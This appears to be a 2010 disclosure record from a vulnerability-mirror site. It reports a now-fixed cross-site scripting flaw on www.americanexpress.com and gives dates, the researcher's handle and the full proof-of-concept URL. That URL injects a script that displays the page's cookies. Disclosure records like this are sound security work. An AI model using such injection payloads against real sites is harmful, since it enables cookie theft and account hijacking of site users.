Security researcher SeeMe, has submitted on 20/09/2010 a cross-site-scripting (XSS) vulnerability affecting www.americanexpress.com, which at the time of submission ranked 488 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 04/10/2010. It is currently fixed. |
Date submitted: 20/09/2010 |
Date published: 04/10/2010 |
Date fixed: 15/10/2010 | Status: FIXED |
Author: SeeMe |
Domain: www.americanexpress.com |
Category: XSS |
Pagerank: 488 |
URL: https://www.americanexpress.com/home/Search/RTN_Proxy.cgi?url=http://help.custhelp.com/cgi-bin/help. cfg/php/enduser/opensearch.php?p_pv=&p_cv=2.1050&faq_source=LAYER&startIndex=0&count=5&callback=%22% 3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E |
Click here to view the mirror
|
|
|